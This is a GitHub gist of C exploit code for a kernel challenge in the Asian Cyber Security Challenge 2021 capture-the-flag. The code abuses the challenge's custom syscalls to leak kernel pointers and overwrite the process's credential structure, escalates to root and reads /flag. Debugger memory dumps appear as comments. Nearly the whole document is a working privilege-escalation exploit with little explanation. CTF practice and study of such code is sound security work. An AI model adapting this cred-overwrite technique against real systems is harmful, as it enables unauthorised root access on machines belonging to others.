Skip to content

Instantly share code, notes, and snippets.

@lordidiot
Created September 19, 2021 03:13
Show Gist options
  • Save lordidiot/7990a49e1336b21abc6bd90c6f837cd6 to your computer and use it in GitHub Desktop.
Save lordidiot/7990a49e1336b21abc6bd90c6f837cd6 to your computer and use it in GitHub Desktop.
Asian Cyber Security Challenge 2021 Exploits
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/syscall.h>
#define ADD 548
#define DEL 549
#define SHOW 550
#define COPY 551
#define CURR 552
void _pause(){
char a;
printf("[+] Press anything to continue\n");
read(0, &a, 1);
}
int main(){
void * current = (void*)syscall(CURR);
printf("[+] current: %p\n", current);
// Copy to note
char * s = malloc(0x1000);
printf("[+] s: %p\n", s);
memset(s, 'A', 0x408);
s[0x408] = '\x00';
syscall(ADD, s);
// Leak pointers
syscall(SHOW, s);
// Overwrite * cred
// 81:0408│ 0x186bf88 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
// 82:0410│ 0x186bf90 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
*(void **)&s[0x410] = current+0x6a8;
*(void **)&s[0x78] = current+0x6a8;
*(void **)&s[0x80] = current+0x6a8;
*(void **)&s[0x88] = current+0x6a8;
*(void **)&s[0x90] = current+0x6a8;
*(void **)&s[0x110] = current+0x6a8;
syscall(ADD, s);
// Setup cred
// 08:0040│ 0xffff8cfc82456880 ◂— 0x1ffffffffff
// 09:0048│ 0xffff8cfc82456888 ◂— 0
// ... ↓ 5 skipped
// 0f:0078│ 0xffff8cfc824568b8 —▸ 0xffff8cfc82404160 ◂— add dword ptr [rax], eax /* 0x100000001 */
// 10:0080│ 0xffff8cfc824568c0 —▸ 0xffff8cfc823f1e80 ◂— add eax, 0x2000000 /* 0x200000005 */
// 11:0088│ 0xffff8cfc824568c8 —▸ 0xffffffff99a4d5a0 ◂— 1
// 12:0090│ 0xffff8cfc824568d0 —▸ 0xffff8cfc813e2cc0 ◂— add eax, 0x1000000 /* 0x100000005 */
// 22:0110│ 0xffff8b1082455950 —▸ 0xffff8b10824559c0 ◂— 0
memset(s, '\x00', 0x400);
*(void **)&s[0x40] = 0x1ffffffffff;
*(void **)&s[0x78] = current+0x6a8;
*(void **)&s[0x80] = current+0x6a8;
*(void **)&s[0x88] = current+0x6a8;
*(void **)&s[0x90] = current+0x6a8;
*(void **)&s[0x110] = current+0x6a8;
syscall(COPY, s);
char flag[100];
int fd = open("/flag", O_RDONLY);
read(fd, flag, 100);
puts(flag);
close(fd);
// Pause to debug
_pause();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment